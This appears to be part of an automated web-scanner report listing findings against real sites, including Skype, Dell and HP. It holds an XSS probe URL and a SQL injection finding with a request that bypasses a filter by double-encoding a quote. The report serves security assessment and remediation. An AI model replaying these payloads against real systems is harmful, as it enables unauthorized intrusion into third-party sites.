20.51. http://blogs.skype.com/en/2010/12/

20.52. http://blogs.skype.com/en/2011/05/

20.53. http://blogs.skype.com/en/2011/07/

20.54. http://blogs.skype.com/en/2011/08/

20.55. http://blogs.skype.com/en/corporate/

20.56. http://blogs.skype.com/en/education/

20.57. http://blogs.skype.com/en/mobile/

20.58. http://blogs.skype.com/en/social_good/

20.59. http://community.skype.com/t5/Deutsch/ct-p/de

20.60. http://community.skype.com/t5/Skype-auf-dem-Computer/ct-p/de_computer

20.61. http://community.skype.com/t5/Zahlungen-Rechnungen-Skype/bd-p/de_payment

20.62. https://developer.skype.com/javascripts/jquery/extensions/jquery.cookie.js

20.63. https://developer.skype.com/silk

20.64. https://developer.skype.com/support

20.65. https://developer.skype.com/support/

20.66. http://h30187.www3.hp.com/resources/scripts/controls.js

20.67. http://h30187.www3.hp.com/resources/scripts/dragdrop.js

20.68. http://h30187.www3.hp.com/resources/scripts/widget/util.js

20.69. http://heartbeat.skype.com/

20.70. http://i.dell.com/images/global/js/lib/jquery-1.2.2e.js

20.71. http://i2.msdn.microsoft.com/Hash/8c37ae5af06d04795b740449553e275e.js

20.72. http://lwn.net/Articles/456878/

20.73. http://lwn.net/articles/456878/%22onmouseover=prompt(%22E-mail%22)%3E

20.74. https://mid.live.com/si/login.aspx/x22

20.75. https://mid.live.com/si/login.aspx/x3c/cite/x3e/x3cspan

20.76. http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html

20.77. http://radware.trk.sodoit.com/rts.js

20.78. https://secure.skypeassets.com//i/js/skype-common.js

20.79. https://secure.skypeassets.com/i/js/skype-common.js

20.80. http://shop.skype.com/apps/Business/Clownfish-for-Skype.html

20.81. http://shop.skype.com/apps/Business/Zaplee-Phone-System-In-The-Cloud.html

20.82. http://shop.skype.com/apps/Call-recording-audio-only/CallBurner-MP3-Call-Recorder.html

20.83. http://shop.skype.com/apps/Call-recording-audio-only/Pamela-Call-Recorder.html

20.84. http://shop.skype.com/apps/Call-recording-audio-only/Pamela-for-Skype-Basic-Edition.html

20.85. http://shop.skype.com/apps/Call-recording-audio-only/PrettyMay-Call-Recorder-for-Skype-Basic-Version.html

20.86. http://shop.skype.com/apps/Call-recording-audio-only/PrettyMay-Call-Recorder-for-Skype-Professional-Version.html

20.87. http://shop.skype.com/apps/Call-recording-audio-video/Evaer-video-recorder-for-Skype.html

20.88. http://shop.skype.com/apps/Call-recording-audio-video/VodBurner-Video-Call-Recorder.html

20.89. http://shop.skype.com/apps/Desktop-whiteboard-sharing/IDroo.html

20.90. http://shop.skype.com/apps/Desktop-whiteboard-sharing/InnerPass-Screen-Sharing.html

20.91. http://shop.skype.com/apps/Faxing/PamFax-for-Mac-OS-X.html

20.92. http://shop.skype.com/apps/Faxing/PamFax-for-Windows.html

20.93. http://shop.skype.com/apps/Integrations-with-popular-software/Skylook-for-MS-Outlook.html

20.94. http://shop.skype.com/apps/Mobile-video-communications/Qik-Video-for-Android.html

20.95. http://shop.skype.com/apps/Mobile-video-communications/Qik-Video-for-Apple.html

20.96. http://sj.wsj.net/djscript/bucket/NA_WSJ/page/0_0_WA_0001/provided/j_global_slim/version/20110902073344.js

20.97. http://sj.wsj.net/djscript/require/j_global_slim/version/20110831104810.js

20.98. https://support.skype.com/en/faq/FA1170/How-can-I-contact-Skype-Customer-Service

20.99. http://welcome.hp-ww.com/country/us/en/styles/hpweb_styles_mac.css

20.100. http://welcome.hp-ww.com/js/hpweb_soctag.js

20.101. http://www.barracudanetworks.com/ns/js/wysiwyg/wysiwyg.js

20.102. http://www.cgisecurity.com/lib/XmlHTTPRequest.shtml

20.103. http://www.cymphonix.com/2011-shaping-demo-sem.html

20.104. http://www.cymphonix.com/scripts/scriptaculous/controls.js

20.105. http://www.cymphonix.com/scripts/scriptaculous/dragdrop.js

20.106. http://www.google.com/search

20.107. http://www.hellobar.com/hellobar-5462-3430.js

20.108. http://www.hp.com/cma/metrics/survey/learningcenter.js

20.109. http://www.hp.com/cma/metrics/survey/lib/sup_class2.js

20.110. http://www.hp.com/cma/metrics/survey/na_num_clicks.js

20.111. http://www.imperva.com/js/lightbox.js

20.112. http://www.imperva.com/js/prototype.js

20.113. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx

20.114. http://www.radware.com/javascript/formRtns.js

20.115. http://www.skype.com/i/js/skype-common.js

20.116. http://www.skype.com/intl/en-us/features/allfeatures/skype-wifi

20.117. http://www.skype.com/intl/en-us/features/allfeatures/skype-wifi/

20.118. http://www.skype.com/intl/en/features/allfeatures/skype-wifi

20.119. http://www.skype.com/intl/en/features/allfeatures/skype-wifi/

20.120. http://www.skypeassets.com/i/js/skype-common.js

20.121. https://www.trustwave.com/

20.122. https://www.trustwave.com/js/jquery/hoverIntent.js

20.123. https://www.trustwave.com/web-application-firewall/

20.124. http://www.wallstreetoasis.com/files/js/js_0ab1e26fe2caa039c043f8d9dcf49447.js

21. Private IP addresses disclosed

21.1. http://connect.facebook.net/en_US/all.js

21.2. https://connect.facebook.net/en_US/all.js

21.3. http://www.facebook.com/extern/login_status.php

21.4. http://www.facebook.com/plugins/fan.php

21.5. http://www.facebook.com/plugins/like.php

21.6. http://www.facebook.com/plugins/like.php

22. Credit card numbers disclosed

22.1. http://googleads.g.doubleclick.net/pagead/ads

22.2. http://lwn.net/Articles/456878/

23. Robots.txt file

23.1. http://6a.typepad.com/.services/content

23.2. http://ad.adtegrity.net/pixel

23.3. http://ad.turn.com/server/pixel.htm

23.4. http://ad.yieldmanager.com/pixel

23.5. https://adwords.google.com/um/StartNewLogin

23.6. http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

23.7. http://altfarm.mediaplex.com/ad/ck/12309-80794-34740-0

23.8. http://apps.sapha.com/appshandler.php

23.9. http://apr.lijit.com///www/delivery/ajs.php

23.10. http://cdn.turn.com/server/ddc.htm

23.11. http://ce.lijit.com/merge

23.12. http://community.skype.com/t5/English/ct-p/English

23.13. http://content-cdn.dell.com/css/dyn/CSSC.aspx

23.14. http://content.dell.com/us/en/business/security-network.aspx

23.15. http://crl.geotrust.com/crls/secureca.crl

23.16. http://dce.sapha.com/engine.php

23.17. http://dell-bsd_us.baynote.net/baynote/tags3/policy

23.18. http://dell-global.baynote.net/baynote/tags3/common

23.19. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/standard

23.20. http://eas.apm.emediate.eu/eas

23.21. http://ecustomeropinions.com/survey/survey.php

23.22. http://embed.technorati.com/linkcount

23.23. http://fls.doubleclick.net/activityi

23.24. https://fls.doubleclick.net/activityi

23.25. http://gacela.eu/bb/mrcsrc/getpixel.php

23.26. https://h10078.www1.hp.com/

23.27. http://h10088.www1.hp.com/cda/gap/display/main/index.jsp

23.28. http://h20158.www2.hp.com/gms/ks/sq/

23.29. http://h20180.www2.hp.com/apps/Nav

23.30. http://h20219.www2.hp.com/services/us/en/business-it-services.html

23.31. http://h30261.www3.hp.com/phoenix.zhtml

23.32. http://h30434.www3.hp.com/psg

23.33. http://h30499.www3.hp.com/hpeb

23.34. http://h30501.www3.hp.com/hpsws

23.35. http://h30507.www3.hp.com/

23.36. http://h41174.www4.hp.com/4/hp/us/en/hho/post_sales/products/hub/|/r3990/|apps/nav/1684651975@x01,x02,x31,x32,x33,Top1,Top2,Top3,Top,Left1,Left2,Left3,x04,x41,x42,x43,x44,x45,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Frame1,Frame2,x11,x12,x13,x14,x15

23.37. http://h71028.www7.hp.com/enterprise/us/en/solutions/large-enterprise-business-solutions.html

23.38. http://h71036.www7.hp.com/hho/cache/252121-0-0-225-121.html

23.39. http://i.dell.com/images/global/general/doc-ready.gif

23.40. http://img-cdn.mediaplex.com/0/12309/universal.html

23.41. http://js.microsoft.com/library/svy/sto/broker-config.js

23.42. http://met1.hp.com/b/ss/hphqsearch/1/H.22.1/s31933527498040

23.43. http://metrics.skype.com/b/ss/skypeallprod/1/H.17/s33706402148852

23.44. http://microsoftsto.112.2o7.net/b/ss/msstomsdn,msstomsdnonly,msstomsdnmktenus,msstolibrollup,msstolibwebdev,msstouberie/1/H.20.3/s6623076066840

23.45. http://msdn.microsoft.com/en-us/library/ms533897(v=vs.85).aspx

23.46. http://now.eloqua.com/visitor/v200/svrGP.aspx

23.47. http://nsm.dell.com/b/ss/dellglobalonline/1/H.23.3/s3547971131745

23.48. http://pagead2.googlesyndication.com/pagead/imgad

23.49. http://pixel.33across.com/ps/

23.50. http://pixel.mathtag.com/event/js

23.51. http://pixel.quantserve.com/pixel/p-46B_c711bvEMM.gif

23.52. http://r.turn.com/r/beacon

23.53. http://rotation.linuxnewmedia.com/www/delivery/ajs.php

23.54. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYwdMDIIDWAyoo4-kAAP______________________________________________PzIJwekAAP____8D

23.55. http://safebrowsing.clients.google.com/safebrowsing/downloads

23.56. http://samples.msdn.microsoft.com/workshop/samples/author/dhtml/refs/insertScript_2.htm

23.57. http://search2.skype.com/search/search.cgi

23.58. https://secure.skype.com/account/login

23.59. https://secure.skypeassets.com/i/css/turbo/full.css

23.60. http://shop.skype.com/apps

23.61. http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js

23.62. https://support.skype.com/

23.63. http://sync.mathtag.com/sync/img

23.64. http://tag.admeld.com/ad/js/179/lijit/728x90/ros

23.65. http://translate.googleapis.com/translate_a/l

23.66. http://ui.skype.com/ui/0/5.5.0.114./en/getlatestversion

23.67. http://vap1den1.lijit.com/www/delivery/lg.php

23.68. http://vap1iad1.lijit.com/www/delivery/lg.php

23.69. http://vap1iad2.lijit.com/www/delivery/lg.php

23.70. http://vap1sfo1.lijit.com/www/delivery/lg.php

23.71. http://vap2den1.lijit.com/www/delivery/lg.php

23.72. http://vap2iad1.lijit.com/www/delivery/lg.php

23.73. http://vap3den1.lijit.com/www/delivery/lg.php

23.74. http://welcome.hp-ww.com/country/us/eng/js/hub/metrics.js

23.75. http://www-cdn.dell.com/content/public/menu.aspx

23.76. http://www.cgisecurity.com/lib/XmlHTTPRequest.shtml

23.77. http://www.google.com/adsense/search/ads.js

23.78. http://www.googleadservices.com/pagead/aclk

23.79. http://www.hp.com/search/

23.80. http://www.ibm.com/favicon.ico

23.81. http://www.imiclk.com/cgi/r.cgi

23.82. http://www.imperva.com/products/wsc_web-application-firewall.html

23.83. http://www.lijit.com/delivery/fp

23.84. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx

23.85. http://www.radware.com/Resources/AppWallSolution.aspx

23.86. http://www.skype.com/go/registration

23.87. http://www.skypeassets.com/i/images/icons/favicon.ico

23.88. https://www.trustwave.com/web-application-firewall/

23.89. http://www.vodburner.com/affland.php

23.90. http://www.w3.org/TR/html5/dom.html

23.91. http://www.w3schools.com/js/js_ex_dom.asp

24. Cacheable HTTPS response

24.1. https://chat1.us.dell.com/netagent/cimlogin.aspx

24.2. https://developer.skype.com/

24.3. https://developer.skype.com/accessories

24.4. https://developer.skype.com/certification

24.5. https://developer.skype.com/certification/accessories

24.6. https://developer.skype.com/certification/certified-list

24.7. https://developer.skype.com/certification/odm-program

24.8. https://developer.skype.com/login

24.9. https://developer.skype.com/public/skypekit

24.10. https://developer.skype.com/public/skypekit/

24.11. https://developer.skype.com/signup

24.12. https://developer.skype.com/silk

24.13. https://developer.skype.com/skypekit/reference/cpp/index.html

24.14. https://developer.skype.com/skypekit/reference/java/index.html

24.15. https://developer.skype.com/skypekit/reference/python/index.html

24.16. https://developer.skype.com/support

24.17. https://developer.skype.com/support/

24.18. https://fls.doubleclick.net/activityi

24.19. https://h30046.www3.hp.com/subchoice/country/us/en/subhub.aspx

24.20. https://secure.skype.com/login

24.21. https://support.skype.com/de/

24.22. https://support.skype.com/en-us/

24.23. https://support.skype.com/en-us/category/ABOUT_SKYPE/

24.24. https://support.skype.com/en-us/category/AFFILIATE_PROGRAM/

24.25. https://support.skype.com/en-us/category/BANK_TRANSFERS/

24.26. https://support.skype.com/en-us/category/BIZ_VERSION/

24.27. https://support.skype.com/en-us/category/BLACKBERRY/

24.28. https://support.skype.com/en-us/category/BUYING_ACCESSORIES/

24.29. https://support.skype.com/en-us/category/CALLER_IDENTIFICATION/

24.30. https://support.skype.com/en-us/category/CALLING/

24.31. https://support.skype.com/en-us/category/CALLING_PHONES_SKYPEOUT/

24.32. https://support.skype.com/en-us/category/CALL_FORWARDING/

24.33. https://support.skype.com/en-us/category/CALL_QUALITY/

24.34. https://support.skype.com/en-us/category/CALL_TRANSFER/

24.35. https://support.skype.com/en-us/category/CONFERENCE_CALLING/

24.36. https://support.skype.com/en-us/category/CONNECTION_ISSUES/

24.37. https://support.skype.com/en-us/category/CONTACTS/

24.38. https://support.skype.com/en-us/category/CORDLESS_PHONES/

24.39. https://support.skype.com/en-us/category/CREDIT_CARDS/

24.40. https://support.skype.com/en-us/category/EXTRAS/

24.41. https://support.skype.com/en-us/category/FACEBOOK/

24.42. https://support.skype.com/en-us/category/FILE_TRANSFER/

24.43. https://support.skype.com/en-us/category/GIFT_CERTIFICATES/

24.44. https://support.skype.com/en-us/category/GIROPAY/

24.45. https://support.skype.com/en-us/category/GROUP_VIDEO_CALLING/

24.46. https://support.skype.com/en-us/category/INSTANT_MESSAGING_WITH_SKYPE/

24.47. https://support.skype.com/en-us/category/MONEYBOOKERS/

24.48. https://support.skype.com/en-us/category/MYSPACEIM_WITH_SKYPE/

24.49. https://support.skype.com/en-us/category/ONLINE_NUMBER_SKYPEIN/

24.50. https://support.skype.com/en-us/category/PAYMENT_PRICES/

24.51. https://support.skype.com/en-us/category/PAYPAL/

24.52. https://support.skype.com/en-us/category/PAYSAFECARD/

24.53. https://support.skype.com/en-us/category/PERSONALISE_SKYPE/

24.54. https://support.skype.com/en-us/category/PREPAID_CARDS/

24.55. https://support.skype.com/en-us/category/PRIVACY__SECURITY/

24.56. https://support.skype.com/en-us/category/PSP/

24.57. https://support.skype.com/en-us/category/PUBLIC_CHATS/

24.58. https://support.skype.com/en-us/category/SCREEN_SHARING/

24.59. https://support.skype.com/en-us/category/SC_CONFIG/

24.60. https://support.skype.com/en-us/category/SC_GETTING_STARTED/

24.61. https://support.skype.com/en-us/category/SC_PBX/

24.62. https://support.skype.com/en-us/category/SC_REQUIREMENTS/

24.63. https://support.skype.com/en-us/category/SC_TROUBLE/

24.64. https://support.skype.com/en-us/category/SEND_MONEY/

24.65. https://support.skype.com/en-us/category/SKYPEFIND/

24.66. https://support.skype.com/en-us/category/SKYPE_2_8_MAC_OR_BELOW/

24.67. https://support.skype.com/en-us/category/SKYPE_4_2_OR_BELOW/

24.68. https://support.skype.com/en-us/category/SKYPE_ACCESS/

24.69. https://support.skype.com/en-us/category/SKYPE_API/

24.70. https://support.skype.com/en-us/category/SKYPE_CALLS_FROM_BROWSERS/

24.71. https://support.skype.com/en-us/category/SKYPE_FOR_ANDROID/

24.72. https://support.skype.com/en-us/category/SKYPE_FOR_IPHONE/

24.73. https://support.skype.com/en-us/category/SKYPE_FOR_LINUX/

24.74. https://support.skype.com/en-us/category/SKYPE_FOR_MAC_OS_X/

24.75. https://support.skype.com/en-us/category/SKYPE_FOR_NOKIA_N800N810/

24.76. https://support.skype.com/en-us/category/SKYPE_FOR_NOKIA_N900/

24.77. https://support.skype.com/en-us/category/SKYPE_FOR_SYMBIAN/

24.78. https://support.skype.com/en-us/category/SKYPE_FOR_WEBOS/

24.79. https://support.skype.com/en-us/category/SKYPE_LITE/

24.80. https://support.skype.com/en-us/category/SKYPE_MANAGER_FOR_MEMBERS/

24.81. https://support.skype.com/en-us/category/SKYPE_ME/

24.82. https://support.skype.com/en-us/category/SKYPE_MOBILE_FOR_VERIZON/

24.83. https://support.skype.com/en-us/category/SKYPE_ON_AU/

24.84. https://support.skype.com/en-us/category/SKYPE_ON_TELUS/

24.85. https://support.skype.com/en-us/category/SKYPE_ON_THREE/

24.86. https://support.skype.com/en-us/category/SKYPE_ON_YOUR_TV/

24.87. https://support.skype.com/en-us/category/SKYPE_PRIME/

24.88. https://support.skype.com/en-us/category/SKYPE_PRO/

24.89. https://support.skype.com/en-us/category/SKYPE_SMS/

24.90. https://support.skype.com/en-us/category/SKYPE_TOOLBARS/

24.91. https://support.skype.com/en-us/category/SKYPE_TO_GO/

24.92. https://support.skype.com/en-us/category/SM_ACCOUNT_DETAILS/

24.93. https://support.skype.com/en-us/category/SM_FEATURES/

24.94. https://support.skype.com/en-us/category/SM_GETTING_STARTED/

24.95. https://support.skype.com/en-us/category/SM_MEMBERS/

24.96. https://support.skype.com/en-us/category/SM_PAYMENTS/

24.97. https://support.skype.com/en-us/category/SM_REPORTS/

24.98. https://support.skype.com/en-us/category/SUBSCRIPTIONS/

24.99. https://support.skype.com/en-us/category/TS_ACCOUNT/

24.100. https://support.skype.com/en-us/category/TS_INSTALL_UPGRADE/

24.101. https://support.skype.com/en-us/category/UKASH/

24.102. https://support.skype.com/en-us/category/VIDEO/

24.103. https://support.skype.com/en-us/category/VID_CALLING/

24.104. https://support.skype.com/en-us/category/VOICEMAIL/

24.105. https://support.skype.com/en-us/category/VOUCHERS/

24.106. https://support.skype.com/en-us/category/WINDOWS_MOBILE/

24.107. https://support.skype.com/en-us/category/YANDEX_MONEY/

24.108. https://support.skype.com/en-us/faq/FA10414/How-do-subscriptions-work

24.109. https://support.skype.com/en-us/faq/FA10416/Why-isn-t-my-subscription-working

24.110. https://support.skype.com/en-us/faq/FA109/I-ve-forgotten-my-password

24.111. https://support.skype.com/en-us/faq/FA11024/Can-I-make-video-calls-on-Facebook

24.112. https://support.skype.com/en-us/faq/FA140/How-can-I-change-my-privacy-settings

24.113. https://support.skype.com/en-us/faq/FA331/What-is-an-Online-Number

24.114. https://support.skype.com/en-us/faq/FA351/How-can-I-pay-for-Skype-products

24.115. https://support.skype.com/en-us/faq/FA589/Why-can-t-I-sign-in-to-Skype

24.116. https://support.skype.com/en-us/glossary

24.117. https://support.skype.com/en-us/search_first/

24.118. https://support.skype.com/en/

24.119. https://support.skype.com/en/category/BANK_TRANSFERS/

24.120. https://support.skype.com/en/category/BIZ

24.121. https://support.skype.com/en/category/CALL

24.122. https://support.skype.com/en/category/CREDIT_CARDS/

24.123. https://support.skype.com/en/category/GIFT_CERTIFICATES/

24.124. https://support.skype.com/en/category/GIROPAY/

24.125. https://support.skype.com/en/category/MESSAGING

24.126. https://support.skype.com/en/category/MONEYBOOKERS/

24.127. https://support.skype.com/en/category/PAY

24.128. https://support.skype.com/en/category/PAYMENT_PRICES/

24.129. https://support.skype.com/en/category/PAYPAL/

24.130. https://support.skype.com/en/category/PAYSAFECARD/

24.131. https://support.skype.com/en/category/PREPAID_CARDS/

24.132. https://support.skype.com/en/category/PRIVACY__SECURITY/

24.133. https://support.skype.com/en/category/PROD

24.134. https://support.skype.com/en/category/SKYPE_FOR_YOUR_MOBILE

24.135. https://support.skype.com/en/category/SUBSCRIPTIONS/

24.136. https://support.skype.com/en/category/TECH

24.137. https://support.skype.com/en/category/TS_ACCOUNT/

24.138. https://support.skype.com/en/category/UKASH/

24.139. https://support.skype.com/en/category/VID_CALL

24.140. https://support.skype.com/en/category/VOUCHERS/

24.141. https://support.skype.com/en/category/YANDEX_MONEY/

24.142. https://support.skype.com/en/faq/FA10184/How-do-I-create-a-Skype-account

24.143. https://support.skype.com/en/faq/FA10673/What-is-Skype-Home

24.144. https://support.skype.com/en/faq/FA109/I-ve-forgotten-my-password

24.145. https://support.skype.com/en/faq/FA1170/How-can-I-contact-Skype-Customer-Service

24.146. https://support.skype.com/en/faq/FA96/How-do-I-change-my-email-address-or-add-another-email-address-to-my-profile

24.147. https://support.skype.com/en/glossary

24.148. https://support.skype.com/en/search

24.149. https://support.skype.com/en/tips

24.150. https://www.trustwave.com/favicon.ico

25. HTML does not specify charset

25.1. http://ad.doubleclick.net/adi/interactive.wsj.com/newscolumns_businessstory

25.2. http://ad.doubleclick.net/adi/interactive.wsj.com/snippet_free_pass

25.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.4. http://fls.doubleclick.net/activityi

25.5. https://fls.doubleclick.net/activityi

25.6. http://h41105.www4.hp.com/m/us/en/index.xsl

25.7. http://h71028.www7.hp.com/enterprise/us/en/halo/index.html

25.8. http://h71036.www7.hp.com/hho/cache/252121-0-0-225-121.html

25.9. http://h71036.www7.hp.com/hho/cache/597818-0-0-225-121.html

25.10. http://i.dell.com/tlFramePage.htm

25.11. http://msite.martiniadnetwork.com/index/

25.12. http://now.eloqua.com/visitor/v200/svrGP.aspx

25.13. http://samples.msdn.microsoft.com/favicon.ico

25.14. http://tags.bluekai.com/site/4234

25.15. http://trk.etrigue.com/track.php

25.16. http://trk.roitrax.com/radware/rts.html

25.17. http://view.atdmt.com/CNT/iview/334305255/direct/01

25.18. http://view.atdmt.com/I36/iview/325171692/direct

25.19. http://www.demosondemand.com/shared_components/javascript/launchDemoStage3PlayerClient_js.asp

25.20. http://www.vodburner.com/affland.php

25.21. http://www.w3schools.com/banners/aspallbannerframe.asp

25.22. http://www.w3schools.com/banners/aspallframe.asp

25.23. http://www.w3schools.com/js/tryit.asp

25.24. http://www.w3schools.com/js/tryit_view.asp

25.25. http://www.w3schools.com/jsref/demo_iframe.htm

25.26. http://www.w3schools.com/jsref/frame_a.htm

25.27. http://www.w3schools.com/jsref/frame_b.htm

25.28. http://www.w3schools.com/jsref/tryit.asp

25.29. http://www.w3schools.com/jsref/tryit_view.asp

26. Content type incorrectly stated

26.1. http://72d329.r.axf8.net/mr/a.gif

26.2. https://apps.skypeassets.com/static/skype.login/js/pwa-complete.js

26.3. https://apps.skypeassets.com/static/skype.login/js/wbr-complete.js

26.4. http://blogs.skype.com/comments.js

26.5. http://blogs.skype.com/en/bloggerbios.js

26.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs

26.7. http://catrg.peer39.net/251/161/1867330751

26.8. http://cs.wsj.net/community/content/images/misc/groups/otherquestionmark.25x25.png

26.9. http://cs.wsj.net/community/content/images/misc/groups/politicscapitol.25x25.png

26.10. http://cs.wsj.net/community/content/images/misc/members/defaultuser.50x50.png

26.11. http://cymphonix.app3.hubspot.com/salog.js.aspx

26.12. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/ajax

26.13. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/standard

26.14. http://h20180.www2.hp.com/favicon.ico

26.15. https://h41183.www4.hp.com/inflexion/scripts/lc-inflexion-lang.js

26.16. http://hplc-prod.s3.amazonaws.com/media/50480/photo_printer_64.jpg

26.17. http://hplc-prod.s3.amazonaws.com/media/50481/all_in_one_64.jpg

26.18. http://hplc-prod.s3.amazonaws.com/media/50482/ink_64.jpg

26.19. http://hplc-prod.s3.amazonaws.com/media/50483/desktops_64.jpg

26.20. http://hplc-prod.s3.amazonaws.com/media/50484/notebooks_64.jpg

26.21. http://hplc-prod.s3.amazonaws.com/media/50485/BN_scanners_64.jpg

26.22. http://hplc-prod.s3.amazonaws.com/media/50487/BN-mouse_key_usb_64.jpg

26.23. http://hplc-prod.s3.amazonaws.com/media/50488/Total_care_64.jpg

26.24. http://hplc-prod.s3.amazonaws.com/media/50581/TS_600t_64.jpg

26.25. http://msite.martiniadnetwork.com/index/

26.26. http://now.eloqua.com/visitor/v200/svrGP.aspx

26.27. http://online.wsj.com/djscript/latest/dojo/cldr/nls/en/number.js

26.28. http://online.wsj.com/public/page/0_0_WC_HeaderWeather-10005.html

26.29. http://samples.msdn.microsoft.com/favicon.ico

26.30. http://search.dell.com/public/menu.aspx

26.31. http://search2.skype.com/search/bb-ratings.cgi

26.32. http://stream1d.radware.net/cdn/images/home/quicknav/ui-bg_glass_100_f6f6f6_1x400.png

26.33. http://stream1d.radware.net/cdn/images/home/quicknav/ui-bg_highlight-soft_100_eeeeee_1x100.png

26.34. http://stream1d.radware.net/cdn/images/home/quicknav/ui-icons_888888_256x240.png

26.35. http://trk.etrigue.com/track.php

26.36. http://twitter.com/statuses/user_timeline.json

26.37. http://www-cdn.dell.com/content/public/menu.aspx

26.38. http://www.cgisecurity.com/.services/json-rpc

26.39. http://www.cgisecurity.com/.shared/images/atpcomment-gradient.png

26.40. http://www.demosondemand.com/shared_components/javascript/launchDemoStage3PlayerClient_js.asp

26.41. http://www.google.com/search

26.42. http://www.jdoasis.com/sites/all/themes/wso/images/logo.jpg

26.43. http://www.skype.com/etc/segmentation.segment.js

26.44. http://www.skype.com/intl/ar/_application/content/_footer/

26.45. http://www.skype.com/intl/cs/_application/content/_footer/

26.46. http://www.skype.com/intl/da/_application/content/_footer/

26.47. http://www.skype.com/intl/de/_application/content/_footer/

26.48. http://www.skype.com/intl/en-gb/_application/content/_footer/

26.49. http://www.skype.com/intl/en-us/_application/content/_footer/

26.50. http://www.skype.com/intl/en-us/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.js

26.51. http://www.skype.com/intl/en-us/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.results_true.js

26.52. http://www.skype.com/intl/en-us/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.unlimited_europe.js

26.53. http://www.skype.com/intl/en-us/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.unlimited_world.js

26.54. http://www.skype.com/intl/en/_application/content/_footer/

26.55. http://www.skype.com/intl/en/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.js

26.56. http://www.skype.com/intl/en/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.results_true.js

26.57. http://www.skype.com/intl/en/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.unlimited_europe.js

26.58. http://www.skype.com/intl/en/prices/subscriptions.country_COUNTRYCODE.currency_CURRENCY.region_US.unlimited_world.js

26.59. http://www.skype.com/intl/es-es/_application/content/_footer/

26.60. http://www.skype.com/intl/es/_application/content/_footer/

26.61. http://www.skype.com/intl/et/_application/content/_footer/

26.62. http://www.skype.com/intl/fi/_application/content/_footer/

26.63. http://www.skype.com/intl/fr/_application/content/_footer/

26.64. http://www.skype.com/intl/hu/_application/content/_footer/

26.65. http://www.skype.com/intl/it/_application/content/_footer/

26.66. http://www.skype.com/intl/iw/_application/content/_footer/

26.67. http://www.skype.com/intl/ja/_application/content/_footer/

26.68. http://www.skype.com/intl/ko/_application/content/_footer/

26.69. http://www.skype.com/intl/lt/_application/content/_footer/

26.70. http://www.skype.com/intl/lv/_application/content/_footer/

26.71. http://www.skype.com/intl/nl/_application/content/_footer/

26.72. http://www.skype.com/intl/no/_application/content/_footer/

26.73. http://www.skype.com/intl/pl/_application/content/_footer/

26.74. http://www.skype.com/intl/pt-br/_application/content/_footer/

26.75. http://www.skype.com/intl/pt/_application/content/_footer/

26.76. http://www.skype.com/intl/ru/_application/content/_footer/

26.77. http://www.skype.com/intl/sv/_application/content/_footer/

26.78. http://www.skype.com/intl/tr/_application/content/_footer/

26.79. http://www.skype.com/intl/zh-Hans/_application/content/_footer/

26.80. http://www.skype.com/intl/zh-Hant/_application/content/_footer/

26.81. https://www.trustwave.com/favicon.ico

26.82. http://www.vodburner.com/favicon.ico

26.83. http://www.xg4ken.com/



1. SQL injection  next
There are 49 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://accessories.us.dell.com/sna/productdetail.aspx [Referer HTTP header]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://accessories.us.dell.com
Path:   /sna/productdetail.aspx

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /sna/productdetail.aspx?sku= HTTP/1.1
Host: accessories.us.dell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1 (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 25226
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: snp_bn=us|bsd|SNPBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:30:43 GMT; path=/
Set-Cookie: StormSCookie=~tidusenbsd04=0&~tidusendhs19=0&bandwidth=NA&flashversion=10&js=1; domain=.dell.com; path=/
X-Powered-By: ASP.NET
